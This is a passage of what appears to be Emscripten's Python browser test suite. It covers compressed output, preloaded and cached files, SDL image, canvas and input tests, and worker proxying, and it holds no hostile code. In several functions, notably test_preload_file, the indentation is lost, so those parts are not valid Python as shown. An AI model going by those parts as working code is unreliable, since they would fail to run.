printErr: function(text) {
if (0) { // XXX disabled for safety typeof dump == 'function') {
dump(text + '\\n'); // fast, straight to the real console
} else {
console.log(text);
}
},
canvas: document.getElementById('canvas'),
setStatus: function(text) {
if (Module.setStatus.interval) clearInterval(Module.setStatus.interval);
var m = text.match(/([^(]+)\((\d+(\.\d+)?)\/(\d+)\)/);
var statusElement = document.getElementById('status');
var progressElement = document.getElementById('progress');
if (m) {
text = m[1];
progressElement.value = parseInt(m[2])*100;
progressElement.max = parseInt(m[4])*100;
progressElement.hidden = false;
} else {
progressElement.value = null;
progressElement.max = null;
progressElement.hidden = true;
}
statusElement.innerHTML = text;
},
totalDependencies: 0,
monitorRunDependencies: function(left) {
this.totalDependencies = Math.max(this.totalDependencies, left);
Module.setStatus(left ? 'Preparing... (' + (this.totalDependencies-left) + '/' + this.totalDependencies + ')' : 'All downloads complete.');
}
};
Module.setStatus('Downloading...');
</script>''' + open(os.path.join(self.get_dir(), 'something.include.html')).read() + '''
</body>
</html>
''')
        self.run_browser('something.html', 'You should see "hello, world!" and a colored cube.', '/report_result?0')
    # this feature only exists in the non-fastcomp backend
    nonfastcomp(nfc)
def test_compression(self):
    """Compile with --compression and check that the compressed side JS is
    produced, smaller than the original, and actually used at load time."""
    main_cpp = os.path.join(self.get_dir(), 'main.cpp')
    open(main_cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
printf("hello compressed world\n");
int result = 1;
REPORT_RESULT();
return 0;
}
'''))
    self.build_native_lzma()
    compression_spec = '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
                                     path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
                                     'LZMA.decompress')
    Popen([PYTHON, EMCC, main_cpp, '-o', 'page.html',
           '--compression', compression_spec]).communicate()
    page_js = os.path.join(self.get_dir(), 'page.js')
    compressed_js = os.path.join(self.get_dir(), 'page.js.compress')
    assert os.path.exists(page_js), 'must be side js'
    assert os.path.exists(compressed_js), 'must be side compressed js'
    assert os.stat(page_js).st_size > os.stat(compressed_js).st_size, 'compressed file must be smaller'
    # hide the uncompressed file so the page is forced to load the compressed one
    shutil.move(page_js, 'page.js.renamedsoitcannotbefound');
    self.run_browser('page.html', '', '/report_result?1')
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
def make_main(path):
print 'make main at', path
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT();
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print 'Testing', srcpath, dstpath
make_main(dstpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete(self.in_dir('assets'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT();
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print srcpath
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
except:
pass
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html']).communicate()
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false);
};
''')
make_main('someotherfile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
def test_preload_caching(self):
    """Verify --use-preload-cache: the first page load populates the cache
    (0 packages served from cache, so the page reports 1), the second load
    is served from it (1 package from cache, so the page reports 2)."""
    open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
    def make_main(path):
        # Emit the C test program that reads `path` and checks the cache state.
        # print() form works identically on Python 2 and 3 for one argument.
        print(path)
        open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT();
return 0;
}
''' % path))
    # JS library hook: counts how many preloaded packages came from the cache.
    open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
    make_main('somefile.txt')
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html']).communicate()
    # First run populates the cache; second run must be served from it.
    self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
    self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
    """Preload several files in a subdirectory tree, both as individual
    --preload-file entries and as one whole-directory entry."""
    # a few files inside a directory
    self.clear()
    # NOTE: dropped stray trailing semicolons; they are no-ops in Python.
    os.makedirs(os.path.join(self.get_dir(), 'subdirr'))
    os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'))
    open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
    open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w').write('''3.14159265358979''')
    open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT();
return 0;
}
'''))
    # by individual files
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html']).communicate()
    self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
    os.remove('page.html')
    # by directory, and remove the source files so the data must come from the package
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html']).communicate()
    shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
    self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
    """Serve the preloaded data package from a custom URL prefix (a local
    'cdn' directory) via Module.filePackagePrefixURL injected into the shell."""
    # a few files inside a directory
    self.clear()
    # NOTE: dropped stray trailing semicolons; they are no-ops in Python.
    os.makedirs(os.path.join(self.get_dir(), 'subdirr'))
    os.makedirs(os.path.join(self.get_dir(), 'cdn'))
    open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
    # change the file package base dir to look in a "cdn". note that normally you would add this in your own custom html file etc., and not by
    # modifying the existing shell in this manner
    open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "cdn/", '))
    open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT();
return 0;
}
'''))
    def test():
        # Build, then move the data file into the "cdn" so it can only be
        # found through the custom prefix URL.
        Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html']).communicate()
        shutil.move('test.data', os.path.join('cdn', 'test.data'))
        self.run_browser('test.html', '', '/report_result?1')
    test()
    # TODO: CORS, test using a full url for filePackagePrefixURL
    #open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "http:/localhost:8888/cdn/", '))
    #test()
def test_compressed_file(self):
    """Preload two data files with LZMA compression (--compression) and check
    they decompress correctly at runtime; also sanity-check the emitted
    .compress artifacts on disk."""
    open(os.path.join(self.get_dir(), 'datafile.txt'), 'w').write('compress this please' + (2000*'.'))
    open(os.path.join(self.get_dir(), 'datafile2.txt'), 'w').write('moar' + (100*'!'))
    open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[21];
FILE *f = fopen("datafile.txt", "r");
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("file says: |%s|\n", buf);
int result = !strcmp("compress this please", buf);
FILE *f2 = fopen("datafile2.txt", "r");
fread(buf, 1, 5, f2);
buf[5] = 0;
fclose(f2);
result = result && !strcmp("moar!", buf);
printf("file 2 says: |%s|\n", buf);
REPORT_RESULT();
return 0;
}
'''))
    self.build_native_lzma()
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-o', 'page.html', '--preload-file', 'datafile.txt', '--preload-file', 'datafile2.txt',
           '--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
                                          path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
                                          'LZMA.decompress')]).communicate()
    assert os.path.exists(os.path.join(self.get_dir(), 'datafile.txt')), 'must be data file'
    assert os.path.exists(os.path.join(self.get_dir(), 'page.data.compress')), 'must be data file in compressed form'
    assert os.stat(os.path.join(self.get_dir(), 'page.js')).st_size != os.stat(os.path.join(self.get_dir(), 'page.js.compress')).st_size, 'compressed file must be different'
    # Rename the source file so the data can only come from the compressed package.
    # (Dropped the stray trailing semicolon from the original line.)
    shutil.move(os.path.join(self.get_dir(), 'datafile.txt'), 'datafile.txt.renamedsoitcannotbefound')
    self.run_browser('page.html', '', '/report_result?1')
def test_sdl_swsurface(self):
    """SDL software-surface path; the page reports 1 on success."""
    src = 'sdl_swsurface.c'
    self.btest(src, expected='1')
def test_sdl_surface_lock_opts(self):
    """Emscripten-specific extensions that optimize SDL_LockSurface and
    SDL_UnlockSurface (enabled via -DTEST_SDL_LOCK_OPTS)."""
    self.btest('hello_world_sdl.cpp', reference='htmltest.png',
               args=['-DTEST_SDL_LOCK_OPTS'],
               message='You should see "hello, world!" and a colored cube.')
def test_sdl_image(self):
    """Load a JPEG via SDL_image and read pixel data; the page reports the
    image width (600). Covers -O2 with --preload-file, both
    --memory-init-file modes, and the 'src@dst' preload destination syntax."""
    # load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
    open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
    for mem in [0, 1]:
        # Second tuple preloads to a different VFS destination via src@dst.
        for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
                                        ('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
            Popen([
                PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
                '--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"'
            ]).communicate()
            self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
    """Same image test as test_sdl_image, but with a '.jpeg' extension."""
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'),
                    os.path.join(self.get_dir(), 'screenshot.jpeg'))
    src = os.path.join(self.get_dir(), 'sdl_image_jpeg.c')
    open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
    cmd = [PYTHON, EMCC, src, '-o', 'page.html',
           '--preload-file', 'screenshot.jpeg',
           '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"']
    Popen(cmd).communicate()
    self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_compressed(self):
    """Load LZMA-compressed preloaded images (PNG and JPEG) and verify the
    decoded width the page reports for each."""
    for image, width in [(path_from_root('tests', 'screenshot2.png'), 300),
                         (path_from_root('tests', 'screenshot.jpg'), 600)]:
        self.clear()
        # print() form works identically on Python 2 and 3 for one argument.
        print(image)
        basename = os.path.basename(image)
        shutil.copyfile(image, os.path.join(self.get_dir(), basename))
        open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
        self.build_native_lzma()
        Popen([
            PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html',
            '--preload-file', basename, '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="' + basename + '"',
            '--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
                                           path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
                                           'LZMA.decompress')
        ]).communicate()
        # Rename the source image so the data can only come from the compressed
        # package. (Dropped the stray trailing semicolon from the original.)
        shutil.move(os.path.join(self.get_dir(), basename), basename + '.renamedsoitcannotbefound')
        self.run_browser('page.html', '', '/report_result?' + str(width))
def test_sdl_image_prepare(self):
    """Prepare (decode) a preloaded image whose '.not' extension hides its type."""
    # load an image file, get pixel data
    dest = os.path.join(self.get_dir(), 'screenshot.not')
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), dest)
    self.btest('sdl_image_prepare.c', reference='screenshot.jpg',
               args=['--preload-file', 'screenshot.not'], also_proxied=True)
def test_sdl_image_prepare_data(self):
    """Prepare an image from in-memory data; '.not' extension hides its type."""
    # load an image file, get pixel data
    dest = os.path.join(self.get_dir(), 'screenshot.not')
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), dest)
    self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg',
               args=['--preload-file', 'screenshot.not'])
def test_sdl_stb_image(self):
    """Decode a preloaded image through the stb_image path (-s STB_IMAGE=1)."""
    # load an image file, get pixel data
    dest = os.path.join(self.get_dir(), 'screenshot.not')
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), dest)
    self.btest('sdl_stb_image.c', reference='screenshot.jpg',
               args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not'])
def test_sdl_stb_image_data(self):
    """Decode in-memory image data through the stb_image path (-s STB_IMAGE=1)."""
    # load an image file, get pixel data
    dest = os.path.join(self.get_dir(), 'screenshot.not')
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), dest)
    self.btest('sdl_stb_image_data.c', reference='screenshot.jpg',
               args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not'])
def test_sdl_canvas(self):
    """sdl_canvas.c under LEGACY_GL_EMULATION; extra coverage runs add
    SAFE_HEAP at -O0 and -O2."""
    base_args = ['-s', 'LEGACY_GL_EMULATION=1']
    for extra in ([],
                  ['-O0', '-s', 'SAFE_HEAP=1'],
                  ['-O2', '-s', 'SAFE_HEAP=1']):
        self.clear()
        self.btest('sdl_canvas.c', expected='1', args=base_args + extra)
def post_manual_reftest(self, reference=None):
    """Post-build hook for manual-reference tests: inject the generated
    reftest.js plus a window.close wrapper into test.html so the reference
    comparison runs right before the page closes.

    reference: reference image filename; defaults to self.reference.
    """
    self.reftest(path_from_root('tests', self.reference if reference is None else reference))
    html = open('test.html').read()
    # The %s below is substituted with the contents of the generated reftest.js.
    html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 1000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
    open('test.html', 'w').write(html)
def test_sdl_canvas_proxy(self):
    """Canvas rendering proxied to a worker, with a preloaded data file."""
    open('data.txt', 'w').write('datum')
    proxy_args = ['--proxy-to-worker', '--preload-file', 'data.txt']
    self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png',
               args=proxy_args, manual_reference=True,
               post_build=self.post_manual_reftest)
def test_glgears_proxy(self):
    """GL gears rendered in a proxied worker, then re-run with the runtime
    ?noProxy option, and with injected failures on the main-thread / worker
    side to verify which environment actually executes main()."""
    self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1'], manual_reference=True, post_build=self.post_manual_reftest)
    # test noProxy option applied at runtime
    # run normally (duplicates above test, but verifies we can run outside of the btest harness
    self.run_browser('test.html', None, ['/report_result?0'])
    # run with noProxy
    self.run_browser('test.html?noProxy', None, ['/report_result?0'])
    # (Removed the unused `original = open('test.js').read()` local: the
    # lambdas below each take their own `original` parameter, and copy()
    # re-reads test.js itself.)
    def copy(to, js_mod):
        # Emit <to>.html/<to>.js, with js_mod applied to the generated JS.
        open(to + '.html', 'w').write(open('test.html').read().replace('test.js', to + '.js'))
        open(to + '.js', 'w').write(js_mod(open('test.js').read()))
    # run with noProxy, but make main thread fail
    copy('two', lambda original: original.replace('function _main($argc,$argv) {', 'function _main($argc,$argv) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:8888/report_result?999");xhr.send(); }'))
    self.run_browser('two.html?noProxy', None, ['/report_result?999'])
    self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
    # run without noProxy, so proxy, but make worker fail
    copy('three', lambda original: original.replace('function _main($argc,$argv) {', 'function _main($argc,$argv) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:8888/report_result?999");xhr.send(); }'))
    self.run_browser('three.html', None, ['/report_result?999'])
    self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
def test_glgears_proxy_jstarget(self):
    # test .js target with --proxy-worker; emits 2 js files, client and worker
    Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles_proxy.c'),
           '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1']).communicate()
    # Wrap the generated JS in the minimal shell by hand.
    shell = open(path_from_root('src', 'shell_minimal.html')).read()
    open('test.html', 'w').write(shell.replace('{{{ SCRIPT }}}', '<script src="test.js"></script>'))
    self.post_manual_reftest('gears.png')
    self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
    """Canvas alpha rendering, run twice: once plain, once with a '-0'
    program argument injected via a pre-js setting Module['arguments']."""
    open(os.path.join(self.get_dir(), 'flag_0.js'), 'w').write('''
Module['arguments'] = ['-0'];
''')
    self.btest('sdl_canvas_alpha.c', reference='sdl_canvas_alpha.png', reference_slack=11)
    self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=11)
def test_sdl_key(self):
    """SDL keyboard events: a pre-js pumps Module._one each frame and defines
    keydown/keyup helpers that synthesize DOM KeyboardEvents. Runs once
    plainly and once with -DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER; the page
    reports 223092870 on success."""
    for defines in [[], ['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']]:
        open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
        open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
        Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html'] + defines + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'NO_EXIT_RUNTIME=1']).communicate()
        self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
    """SDL keyboard events when the app is proxied to a worker: key events are
    synthesized in the page (post-build HTML injection) and must reach the
    worker; expects the same 223092870 checksum as test_sdl_key."""
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
    def post():
        # Inject the key-event generators and a fixed key sequence into the
        # generated page, right before </body>.
        html = open('test.html').read()
        html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
        open('test.html', 'w').write(html)
    self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'NO_EXIT_RUNTIME=1'], manual_reference=True, post_build=post)
def test_sdl_text(self):
    """SDL text input: a pre-js pumps Module._one each frame and provides
    simulateKeyEvent to synthesize keypress events; the page reports 1."""
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
    open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
    self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
    """SDL mouse events: a pre-js exposes simulateMouseEvent, which dispatches
    mousedown+mouseup (button >= 0) or mousemove (button < 0) on the canvas,
    offset by the canvas position. The page reports 740 on success."""
    open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
